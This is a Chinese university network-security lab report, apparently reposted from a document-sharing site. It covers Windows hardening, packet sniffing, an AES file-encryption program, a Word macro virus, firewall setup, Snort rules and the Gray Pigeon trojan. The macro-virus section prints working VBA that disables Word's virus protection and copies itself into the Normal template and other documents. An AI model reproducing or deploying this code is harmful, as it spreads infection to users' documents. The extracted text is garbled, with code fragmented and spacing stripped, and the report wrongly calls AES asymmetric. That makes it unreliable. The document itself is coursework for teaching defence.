网络安全实验报告文档格式.docx
- 文档编号:19659843
- 上传时间:2023-01-08
- 格式:DOCX
- 页数:45
- 大小:3.78MB
网络安全实验报告文档格式.docx
《网络安全实验报告文档格式.docx》由会员分享,可在线阅读,更多相关《网络安全实验报告文档格式.docx(45页珍藏版)》请在冰豆网上搜索。
用记事本打开services文件,可查看知名端口和服务的对照表,可以关闭一些不必要的端口。
(3)开启审核策略
开始-->管理工具-->本地安全策略-->本地策略-->审核策略;
在右边的窗口中双击审核过程追踪,将成功和失败都勾选。
(开启密码策略,开启账户策略,设置账户策略操作步骤如上。
)
三、安全配置高级篇
•高级篇介绍操作系统安全信息通信配置,包括十四条配置原则:
•关闭DirectDraw、关闭默认共享
•禁用DumpFile、文件加密系统
•加密Temp文件夹、锁住注册表、关机时清除文件
•禁止软盘光盘启动、使用智能卡、使用IPSec
•禁止判断主机类型、抵抗DDOS
禁止Guest访问日志和数据恢复软件
在开始—〉运行里面输入regrdit进入注册表编辑器。
实验结果:
去掉所有测试帐户
设置屏幕密码保护:
关闭不必要的端口:
开启审核过程追踪:
关闭默认共享:
禁用Dump文件
锁住注册表
关机时清除文件
禁止判断主机类型:
禁止Guest访问日志
心得体会:
通过这次实验,我学到了一些基本的Windows系统的安全配置。
感觉获益匪浅,我在我自己的电脑做了些安全配置,对我电脑起到了很好的防护作用,不过步骤感觉比较多,需要记清楚,所以我还必须多加熟悉具体步骤。
安全级别也有低,中高,三个级别,所以可以根据自己的需求进行相关配置。
实验二:
以太网网络监听与反监听
实验时间:
2012年10月22日
以太网监听与反监听
实验目的:
通过实验使学生更加清楚网络监听给网络安全所造成的危害;
掌握以太网网络监听的工作原理、常见的监听工具的使用;
根据以太网网络监听的工作原理,设计监听检测软件。
使用网络监听工具iris、Ethereal、Sniffpro等工具进行网络监听,获取用户的关键信息,分析网络信息流动,分析协议数据包结构。
实验环境:
Windows2000/NT/XP;
软件:
Ethereal;
1、运行Ethereal开始抓包,网络信息流动,分析协议数据包结构;
2、设置过滤规则,对所抓包进行过滤;
1、软件运行结果
2、展开其封包的内容
3、设置过滤规格,对所抓包进行过滤
通过对Ethereal软件的操作,了解监听与反监听的机制,感觉到这个软件简单好用,但在实验中也会出现一些Ethereal的使用问题,抓包不要抓太长时间,信息量会很大,抓包时间太长会让机子变卡。
可以尝试扫描附近的计算机测试看能不能成功。
实验三:
对称加密算法AES的实现
实验时间:
2012年10月29日
通过这项实验使学生深入理解对称加密的基本原理,了解各种经典的对称加密算法,实现最新的对称加密算法AES。
理解AES算法的实现过程,然后用C或C++编写AES加解密程序。
WindowsXP;
vc6.0;
(1)完善AES加密、解密算法
(2)分析软件的执行效率即每秒钟加密的字节数
(3)给出改进意见
1.源程序;
//mainpro.cpp
//Thismodulesisthemainprogram;
//author:
HJJD
//2008-11-25
#include"
stdio.h"
string.h"
aeshead.h"
addroundkey.cpp"
bytemul.cpp"
keyexpansion.cpp"
mixcolumn.cpp"
invmixcolumn.cpp"
shiftrow.cpp"
invshiftrow.cpp"
bytesub.cpp"
invbytesub.cpp"
rijndael.cpp"
invrijndael.cpp"
blockxor.cpp"
voidmain()
{
UCcipherkey[4*NK]={0};
UCiv[4][NB]={0,1,0,0,
0,0,2,0,
0,0,0,6,
0,0,0,0};
charuserKey[4*NK+1];
UCstate[4][NB];
UCstate1[4][NB];
UCstate2[4][NB];
UCw1[16]={"
AES-CRYPTION"
};
UC*s1=&
state[0][0];
UC*v1=&
iv[0][0];
UC*t1=&
state1[0][0];
UC*t2=&
state2[0][0];
UC*t3;
intcount=4*NB;
inti;
FILE*fpr,*fpw;
charfilename1[20],filename2[20],c;
ULexpandkey[NB*(NR+1)];
printf("
Youwanttoencryptionordecryption?
[e/d]"
);
scanf("
%c"
&
c);
if(c=='
e'
||c=='
E'
{
printf("
>
-----------------------------------------------\nPleaseinputfilenameyouwanttoencryption:
\n"
scanf("
%s"
filename1);
if((fpr=fopen(filename1,"
rb"
))==NULL)
{
printf("
Sorry!
Cannotopenthisfile\n"
return;
}
if((fpw=fopen(strcat(filename1,"
.aes"
),"
wb+"
{
Cannotopenthisfile\n"
Pleaseinputyourkeynomorethan%dchar!
4*NK);
userKey);
for(i=0;
i<
4*NK;
i++)cipherkey[i]=userKey[i];
keyexpansion(cipherkey,expandkey);
Encryptionisgoingon,pleasewaiting........\n"
fwrite(w1,1,16,fpw);
//写入加密文件的起始信息
while(!
feof(fpr))//开始加密文件
{count=fread(s1,1,count,fpr);
if(count==4*NB)
{
blockxor(s1,v1,4*NB);
for(i=0;
=4*NB-1;
i++)iv[i%4][i/4]=s1[i];
rijndael(iv,expandkey);
fwrite(*iv,1,4*NB,fpw);
}
else//加密最后一块
for(i=count;
i++)
s1[i]=0;
w1[15]=count;
blockxor(s1,v1,4*NB);
for(i=0;
rijndael(iv,expandkey);
fwrite(*iv,1,4*NB,fpw);
}
rewind(fpw);
//写入加密文件的头信息
fclose(fpr);
fclose(fpw);
Encryptionisover,pressanykeytoreturn.\n"
}
elseif(c=='
d'
D'
)//解密文件过程
{
Pleaseinputfilenameyouwanttodecryption:
Pleaseinputnewfilenamefordecryption:
filename2);
if((fpr=fopen(filename1,"
if((fpw=fopen(filename2,"
if(!
feof(fpr))fread(w1,1,16,fpr);
//读出被加密文件的文件头
feof(fpr))
fread(s1,1,count,fpr);
//开始解密
for(i=0;
=count-1;
i++)t1[i]=s1[i];
//为下次异或保存
invrijndael(state,expandkey);
i++)t2[i]=state[i%4][i/4];
blockxor(t2,v1,4*NB);
t3=t1;
t1=v1;
v1=t3;
fgetc(fpr);
feof(fpr)){fwrite(t2,1,4*NB,fpw);
fseek(fpr,-1,1);
}
elsefwrite(t2,1,w1[15],fpw);
};
fclose(fpw);
实验步骤:
1.新建文件my.txt,如下图:
3.输入e进行加密,如下图:
加密后的文件如下:
加密后的文件名:
my.txt
4.进行解密,如下图:
输入d,解密后如下:
最后解密成功。
六、实验心得
在本次实验中,要充分理解AES加密和解密的原理,把源代码弄清楚。
在实验过程中,在理解密钥的行列移位和列混合时,有一些难点,遇到不懂得可以请教老师和同学。
因为AES是非对称加密,所以其中的加解密过程需要花费一定的时间,需要耐心。
实验四:
脚本病毒和宏病毒分析
2012年11月5日
通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。
1、写出实验过程和病毒感染后的现象;
2、试分析宏病毒的破坏模块应该怎样编写;
3、总结宏病毒的预防方法;
office2003;
1、打开Word2000,新建一个文档名为“test”;
2、点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮;
3、在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA;
4、点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;
在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”;
5、点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB项目的访问”;
6、保存并关闭“test”文档;
7、新建一个文档test1,关闭后重新打开,观察test1是否被感染。
8、清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose宏。
1、程序代码
Subautoclose()
'
autocloseMacro
宏在2005-8-26由jingjd创建
OnErrorResumeNext
Application.DisplayAlerts=wdAlertsNone
Application.EnableCancelKey=wdCancelDisabled
Application.DisplayStatusBar=False
'
Options.VirusProtection=False
Options.SaveNormalPrompt=False
ConstVirusName="
AOPEDMOK"
MsgBoxActiveDocument.VBProject.VBComponents.Item
(2).Name
MsgBoxActiveDocument.VBProject.VBComponents
(2).Name
SetDoc=ActiveDocument.VBProject.VBComponents
SetTmp=NormalTemplate.VBProject.VBComponents
ConstExportSource="
E:
\aopedmok.txt"
Forj=1ToDoc.Count
IfDoc(j).Name=VirusNameThen
DocInstalled=1
Doc(j).ExportExportSource
EndIf
Nextj
Fori=1ToTmp.Count
IfTmp(i).Name=VirusNameThen
TmpInstalled=1
Tmp(i).ExportExportSource
Nexti
IfTmpInstalled=0Then
Tmp.ImportExportSource
NormalTemplate.Save
IfDocInstalled=0Then
Doc.ImportExportSource
ActiveDocument.SaveAsActiveDocument.FullName
EndIf
MsgBox"
HaHa,youareattacked!
"
0,"
Word,Macro"
EndSub
2、创建宏
3、输入示例程序
4、管理器设置
5、感染后的效果
宏病毒是一种利用应用程序宏语言编制的计算机病毒,它附着在某个文件上,当用户打开这个文件时,宏病毒被激活,并产生连锁性的感染,并驻留在Normal面板上,通过本次实验,要想清楚宏病毒,必须要先认识它,学防也要懂攻。
五简单防火墙的配置实验日志
2012年11月12日
简单防火墙的配置
利用Windows2000/XP控制台中的IP安全策略管理单元实现阻止某一特定的IP地址对本机的任何基于TCP协议的访问。
1.添加IP安全策略管理单元;
2.添加IP筛选器表;
3.添加IP筛选器操作;
4.创建IP安全策略;
5.应用IP安全策略。
本次实验中我学习到了关于防火墙的配置,也对防火墙对数据包的过滤有了的初步的了解。
这次实验让我了解到原来电脑上的防火墙也可以利用起来保护我们的电脑,这是一项基本的安全配置,理应掌握。
六入侵检测技术实验日志
2012年11月19日
入侵检测技术
通过这项实验使学生掌握入侵检测技术基本原理,以及学会在Windows或Linux平台下配置简单的入侵检测系统。
1.任务性质:
验证性实验
2.任务描述:
Snort是一款轻量级的网络入侵检测系统,能够在IP网络上进行实时的流量分析和数据包记录。
它不仅能进行协议分析、内容检索、内容匹配,而且能用于侦测诸如缓冲溢出、隐秘端口扫描、CGI攻击、SMB探测、操作系统指纹识别等大量的攻击或非法探测。
(1)、软件的安装
先安装winpcap3.0;
再安装Snort_232;
注意:
在安装时不要更改默认设置
(Snort软件从ftp->
软件及工具下载Snort_2_8_6_Installer.exe;
具体安装与使用参见Snort安装与使用教程)
(2)、启动Snort
C:
\snort\bin>
snort-N-l..\log-h172.23.2.x/32-c..\etc\snort.conf
“172.23.2.x”中的x是本机IP地址的最后一个数。
(3)、观察报警信息
让其他同学使用superscan扫描本机,观察并分析log目录下的报警信息;
(4)、添加规则
在dos.rules文件中加入
alerttcp$EXTERNAL_NETany->
$HOME_NET80(msg:
maybemySYNflood"
;
flow:
to_server;
flags:
!
A,S;
threshold:
typeboth,trackby_dst,cont15,seconds60;
添加此规则后可以检测到SYNFlood攻击。
1、安装Snort;
2、修改环境变量PATHC:
\Snort\bin
3、启动snort
4、Ctrl+c暂停扫描,显示结果
通过本次实验让我学习到了入侵检测技术基本原理,以及学会在Windows平台下配置简单的入侵检测系统。
在实验中第一件事情要做的就是关闭电脑上已启动的任何杀毒软件,比如360,金山毒霸。
现今社会网络安全问题日益严重,日益凸显它的重要地位。
实验七:
木马与远程监控软件
2012年11月26日
了解木马工作原理
了解灰鸽子远程管理软件使用方法
了解木马的危害
(1)灰鸽子远程管理程序概述
(2)灰鸽子软件的安装
(3)灰鸽子客户端的使用方法
(4)灰鸽子服务器端程序配置
(5)使用灰鸽子客户端进行远程控制
(5)灰鸽子木马的查杀
配置灰鸽子:
配置ftp服务器:
Ip包扫描:
通过本次实验我进一步认识了木马,也学会了灰鸽子软件的基本使用方法,虽然灰鸽子软件比较老了,但是也能从中学习到基础知识,利用该软件让我感受到了木马的强大,带给我学习的浓厚的兴趣。
实验八使用SSL加密HTTP通道
2012年12月3日
使用SSL加密HTTP通道
在这个实验中,将在Windows或Linux环境下给tomcat配置SSL。
在完成此实验后能够加密客户端与服务器端的所有通信并认证进行单项或双向认证。
1.写出实验过程及结果;
2.分析加密是在哪一层进行的。
1.控制面板->
IIS->
默认站点->
右键属性->
目录安全性->
服务器证书->
新建证书->
单位信息->
站点公用名称->
证书保存文件
2.Http:
//172.23.2.5/certsrv申请证书->
高级申请->
使用base64编码(填写证书内容,用UltraEdit打开证书文件,全选复制粘贴到此栏中)->
下载证书
3.再IIS->
属性->
检索CA证书->
下载CA证书->
保存->
打开安装证书
4.安装完成后,用IE当问此web时,在IE地址栏输入Https:
//172.23.2.X,可发现传输信息已经加密
服务器证书:
创建新证书:
申请证书:
颁发证书:
Ssl安装:
端口设置:
证书确认:
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 网络安全 实验 报告
![提示](https://static.bdocx.com/images/bang_tan.gif)